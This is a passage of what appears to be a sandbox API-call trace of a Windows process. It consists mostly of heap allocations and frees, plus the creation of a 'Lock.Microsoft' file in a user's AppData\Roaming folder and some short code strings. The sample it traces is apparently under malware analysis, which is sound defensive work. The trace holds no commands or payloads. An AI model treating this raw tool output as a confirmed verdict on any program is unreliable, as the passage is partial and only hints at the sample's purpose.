hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0201.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0201.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0201.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0201.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0201.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0201.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0201.150] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0201.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0201.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0201.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0201.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0201.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0201.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0201.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0201.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0201.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0201.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0201.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0201.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0201.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0201.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0201.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0201.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0201.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0201.154] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0201.154] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.154] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.154] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0201.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0201.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0201.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Microsoft" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.154] GetLastError () returned 0x5 [0201.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0201.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0201.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0201.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0201.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0201.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0201.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.Microsoft" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0201.156] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.156] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.156] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0201.156] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0201.156] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0201.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0201.157] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0201.157] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0201.157] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0201.157] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0201.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0201.157] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0201.157] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0201.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0201.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0201.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0201.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0201.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0201.158] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0201.158] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.159] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0201.159] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.159] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0201.159] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0201.159] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0201.160] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0201.160] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0201.160] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0201.160] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.160] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0201.160] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0201.160] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.160] RtlAllocateHeap 